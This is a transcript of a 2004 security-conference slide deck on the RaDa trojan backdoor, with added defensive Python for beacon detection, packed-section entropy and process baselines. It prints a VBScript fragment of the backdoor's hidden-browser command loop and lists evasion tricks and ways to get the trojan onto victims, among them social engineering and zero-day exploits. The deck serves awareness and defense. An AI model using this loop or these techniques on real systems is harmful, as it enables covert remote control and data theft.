The document describes RaDa, a new trojan backdoor that allows remote control of an infected system. RaDa uses Internet Explorer to communicate over HTTP with a controller site that issues commands. It can execute commands, download and upload files, and take screenshots without appearing in the task manager. The presentation demonstrates its capabilities and discusses improving authentication, using additional communication channels, and techniques for getting RaDa installed on target systems. Countermeasures like firewalls and behavioral analysis are recommended to detect trojans like RaDa.
2. Agenda
• Introduction
• Healthy Environment
• Remote Control (RaDa Demo)
• One step beyond
• Getting it in
• Countermeasures
RaDa: a “new” trojan backdoor 2
3. Intro
• Awareness of trojans for remote control & protection measures.
• Most concepts are based on Setiri (R. Temmingh & H. Meer, BH 2002)
• Implemented by Raul Siles, David Perez & Jorge Ortiz
• Honeynet Project SOTM in September (Thanks Lance and Ed!)
4. A healthy environment
• You have done a pretty good job:
– Policy & procedures
– Firewall (ingress and egress filters)
– IDS
– Secure configurations
– AV and Personal Firewalls
• But problems appear…
5. A healthy environment
Diagram: Internet → Router → Proxy → Firewall → IDS → Secure system
6. Remote Control
• Let’s think for a minute that the
intruder has been able to install a
program.
• We shall cover this later.
7. Remote Control: implementation
• RaDa:
– Very easy to do
– A lot of Cut&Paste code (Google
knows how to do it!)
– Visual Basic, Perl…
– Using the IE of the system
– HTTP communications
8. RaDa: implementation
Sub RaDa_Run()
    ' Load commands file
    Set oExplorer = CreateObject("InternetExplorer.Application")
    oExplorer.Visible = 0
    sCommandsURL = sServerURL & "/" & sCommandsFile
    oExplorer.Navigate sCommandsURL

    ' Loop through the commands
    ' (Input fields in the first Form)
    For Each Element In oExplorer.Document.Forms(0).Elements
        Select Case Element.Name
            Case "exe"
                vRetValue = CommandExe(Element.Value)
            Case "get"
                vRetValue = CommandGet(Element.Value)
            Case "put"
                vRetValue = CommandPut(Element.Value)
            Case Else
                ' Ignore unknown command
        End Select
    Next Element

    ' Close Internet Explorer and release the object variable "oExplorer"
    oExplorer.Application.Quit
    Set oExplorer = Nothing
End Sub
9. RaDa: How It Works
Diagram: Intruder, Controller (Ctrler) and RaDa-infected host, linked over HTTP/HTTPS
1. Intruder publishes order
2. RaDa opens invisible IE
3. IE sends GET to Ctrler
4. Ctrler sends command back to RaDa
5. RaDa execs command & sends response with POST
6. Intruder retrieves results from Ctrler
10. Demo
RaDa: Command Exec
Diagram: Intruder, Controller (Ctrler) and RaDa-infected host
1. RaDa/IE retrieves command from Ctrler with GET
2. Parse page <input type="text" name="exe" value="…">
3. Exec command with Cmd.exe
11. Demo
RaDa: File Download
Diagram: Intruder, Controller (Ctrler) and RaDa-infected host
1. RaDa/IE retrieves command from Ctrler with GET
2. Parse page <input type="text" name="get" value="…">
3. Download file from Ctrler with POST.
4. UUdecode and save it
12. Demo
RaDa: Screen Capture
Diagram: Intruder, Controller (Ctrler) and RaDa-infected host
1. RaDa/IE retrieves command from Ctrler with GET
2. Parse page <input type="text" name="screenshot" value="…">
3. Capture screen with selected name
13. Demo
RaDa: File Upload
Diagram: Intruder, Controller (Ctrler) and RaDa-infected host
1. RaDa/IE retrieves command from Ctrler with GET
2. Parse page <input type="text" name="put" value="…">
3. Send back contents with POST
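All four demo slides share one traffic shape: a periodic GET of the same commands page through the system's own IE, followed by a POST back to the same host. Because the user agent is the real browser's, a signature on the request tells a defender nothing; the rhythm does. The following Python is an added example written for this page, not code from the RaDa authors, the Honeynet Project or the presentation. The log format (epoch seconds, client address, method, URL, user agent), the hostnames and the addresses are all constructed for the demonstration.

```python
"""Beacon detection over proxy log lines (added example; constructed data)."""
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlparse

# Constructed sample log, one request per line:
#   "<epoch> <client> <method> <url> <user-agent>"
# 10.0.0.5 polls one page about once a minute and POSTs to the same host;
# 10.0.0.7 is ordinary, irregular browsing. Hosts and addresses are invented.
SAMPLE_LOG = """\
1096300000 10.0.0.5 GET http://ctrl.example/RaDa/commands.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300061 10.0.0.5 GET http://ctrl.example/RaDa/commands.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300062 10.0.0.5 POST http://ctrl.example/RaDa/upload.cgi Mozilla/4.0 (compatible; MSIE 6.0)
1096300120 10.0.0.5 GET http://ctrl.example/RaDa/commands.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300181 10.0.0.5 GET http://ctrl.example/RaDa/commands.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300240 10.0.0.5 GET http://ctrl.example/RaDa/commands.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300005 10.0.0.7 GET http://news.example/index.html Mozilla/4.0 (compatible; MSIE 6.0)
1096300400 10.0.0.7 GET http://news.example/sports.html Mozilla/4.0 (compatible; MSIE 6.0)
1096301900 10.0.0.7 GET http://news.example/index.html Mozilla/4.0 (compatible; MSIE 6.0)
1096302100 10.0.0.7 GET http://news.example/index.html Mozilla/4.0 (compatible; MSIE 6.0)
1096303000 10.0.0.7 GET http://news.example/index.html Mozilla/4.0 (compatible; MSIE 6.0)
"""


def parse_log(text):
    """Yield (timestamp, client, method, url); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) < 4:
            continue
        try:
            yield int(parts[0]), parts[1], parts[2].upper(), parts[3]
        except ValueError:
            continue


def find_beacons(text, min_hits=4, max_cv=0.2):
    """Flag (client, url) pairs fetched at least min_hits times at a steady
    interval: coefficient of variation of the gaps <= max_cv. Each finding
    also counts POSTs from that client to the same host, the other half of
    the GET-command / POST-result pattern."""
    gets = defaultdict(list)
    posts = defaultdict(int)
    for ts, client, method, url in parse_log(text):
        host = urlparse(url).netloc
        if method == "GET":
            gets[(client, url)].append(ts)
        elif method == "POST":
            posts[(client, host)] += 1

    findings = []
    for (client, url), stamps in gets.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({
                "client": client,
                "url": url,
                "hits": len(stamps),
                "mean_interval": avg,
                "cv": cv,
                "posts_to_host": posts[(client, urlparse(url).netloc)],
            })
    findings.sort(key=lambda f: f["cv"])
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['url']}: {f['hits']} GETs about every "
              f"{f['mean_interval']:.0f}s (cv={f['cv']:.3f}), "
              f"{f['posts_to_host']} POST(s) to the same host")
```

The thresholds (four hits, 20% jitter) are starting points, not values from the slides; a real deployment would tune them per proxy and add an allow-list for legitimate pollers such as update services, which show the same regularity.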
14. Demo
RaDa: hiding techniques
• No application in Task Manager
• Process name
• Packed
• HTTP through IE using HTML
• Misleading info
• VMWare detection
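Of the hiding techniques listed, "Packed" is one a defender can test for directly: a packer compresses or encrypts the original sections, so their byte entropy climbs toward 8 bits per byte, while ordinary code and data sit well below that. The Python below is an added example for this page, not code from RaDa or the presentation. It parses the PE section table with the standard library only; the "executable" it inspects is a constructed PE-shaped blob built in memory (not a real or runnable binary), and the 7.0-bit threshold is a common heuristic rather than a value from the slides.

```python
"""Section entropy heuristic for packed PE files (added example; constructed sample)."""
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (section name, raw bytes) by walking the PE section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]


def packed_sections(image: bytes, threshold: float = 7.0):
    """Return {section name: (entropy rounded to 3 places, flagged)}."""
    report = {}
    for name, data in pe_sections(image):
        ent = shannon_entropy(data)
        report[name] = (round(ent, 3), ent >= threshold)
    return report


def build_sample_pe(sections):
    """Constructed PE-shaped blob with the given (name, bytes) sections.
    It has no optional header and cannot run; it only exercises the parser."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)     # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    data_start = 0x40 + len(coff) + 40 * len(sections)
    table, blob = b"", b""
    for name, data in sections:
        ptr = data_start + len(blob)
        table += name.ljust(8, b"\0")[:8]
        # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, then
        # 16 bytes of relocation/line-number fields and characteristics (zeroed)
        table += struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
        blob += data
    return dos + coff + table + blob


# Constructed sample: a code-like section of NOPs and a short repeated string
# (entropy exactly 2.0 bits) next to a random-looking section (about 7.95 bits).
_rng = random.Random(2004)
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x90" * 2048 + b"ABCD" * 512),
    (b"UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
])

if __name__ == "__main__":
    for name, (ent, flagged) in packed_sections(SAMPLE_PE).items():
        print(f"{name:<8} {ent:5.3f} bits/byte {'PACKED?' if flagged else ''}")
```

High entropy alone is not proof of packing (embedded resources, certificates and compressed data look the same), so the heuristic is best used to prioritise samples for the baseline and signature checks that follow, not as a verdict.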
15. One Step Beyond
• Strong authentication of commands
(GPG)
• Blog/Wiki
• Multiagent management Console
• Other channels (mail, dns, ping,
ftp)
16. Getting it in
• Zero day exploit
• Ask for help:
– Mail attachment
– Download
– Social engineering
• Insider
17. Countermeasures
• User awareness
• Baselines (processes, memory…)
• Restrict web access
• Update AV signatures frequently.
• Signed Executables
• Behavioral vs. Signature analysis
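"Baselines (processes, memory…)" in practice means recording what a known-good host runs and diffing later snapshots against it. The comparison has to cover image path and hash, not just the process name, because the "Process name" hiding technique from the demo is precisely a familiar name on an unfamiliar binary. The Python below is an added example for this page, not code from the presentation; the baseline, the snapshot and the image contents are constructed, and a real snapshot would come from the host's process listing plus a hash of each image on disk.

```python
"""Process baseline diff: name, path and image hash (added example; constructed data)."""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed baseline from a known-good host, keyed by lowercase image name.
# Paths and image bytes are invented stand-ins for real files.
BASELINE = {
    "explorer.exe": {"path": r"c:\windows\explorer.exe",
                     "sha256": sha256_hex(b"explorer-image")},
    "svchost.exe":  {"path": r"c:\windows\system32\svchost.exe",
                     "sha256": sha256_hex(b"svchost-image")},
    "winlogon.exe": {"path": r"c:\windows\system32\winlogon.exe",
                     "sha256": sha256_hex(b"winlogon-image")},
}

# Constructed later snapshot of the same host. Three of these should stand out.
SNAPSHOT = [
    {"pid": 1024, "name": "explorer.exe", "path": r"c:\windows\explorer.exe",
     "image": b"explorer-image"},
    {"pid": 640, "name": "svchost.exe", "path": r"c:\windows\system32\svchost.exe",
     "image": b"svchost-image"},
    # same name and path as the baseline entry, but a different binary
    {"pid": 1200, "name": "svchost.exe", "path": r"c:\windows\system32\svchost.exe",
     "image": b"something-else"},
    # familiar name, unexpected location (case differences are ignored)
    {"pid": 1300, "name": "WinLogon.exe", "path": r"c:\temp\winlogon.exe",
     "image": b"not-winlogon"},
    # never seen on the baseline at all
    {"pid": 1400, "name": "update.exe", "path": r"c:\temp\update.exe",
     "image": b"unknown"},
]


def diff_processes(baseline, snapshot):
    """Return [(pid, name, reason)] for every process that does not match the
    baseline: unknown name, known name from a different path, or known name and
    path but a different image hash. Matching processes produce nothing."""
    findings = []
    for proc in snapshot:
        name = proc["name"].lower()
        known = baseline.get(name)
        if known is None:
            findings.append((proc["pid"], name, "not in baseline"))
            continue
        if proc["path"].lower() != known["path"].lower():
            findings.append((proc["pid"], name, f"unexpected path {proc['path']}"))
        elif sha256_hex(proc["image"]) != known["sha256"]:
            findings.append((proc["pid"], name, "image hash differs from baseline"))
    return findings


if __name__ == "__main__":
    for pid, name, reason in diff_processes(BASELINE, SNAPSHOT):
        print(f"pid {pid:>5} {name:<14} {reason}")
```

The hash check is what makes the "Signed Executables" bullet operational on hosts where signing is not enforced: a name and path that match but a hash that does not is the case a process list alone would never show.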
18. Scan of the Month
• Goal:
– Improve the Windows reverse
engineering malware state of the art
• Honeynet Project:
– http://www.honeynet.org/scans/
19. That’s all folks
• Thank you!
• Any questions?
FIST Conference October/Madrid 2004
20. Attribution-NonCommercial-NoDerivs 2.0
You are free:
to copy, distribute, display, and perform the work
Under the following conditions:
Attribution. You must give the original author credit.
Noncommercial. You may not use this work for commercial purposes.
No Derivative Works. You may not alter, transform, or build upon this work.
For any reuse or distribution, you must make clear to others the license terms of this work.
Any of these conditions can be waived if you get permission from the author.
Your fair use and other rights are in no way affected by the above.
This is a human-readable summary of the http://creativecommons.org/licenses/by-nc-nd/2.0/.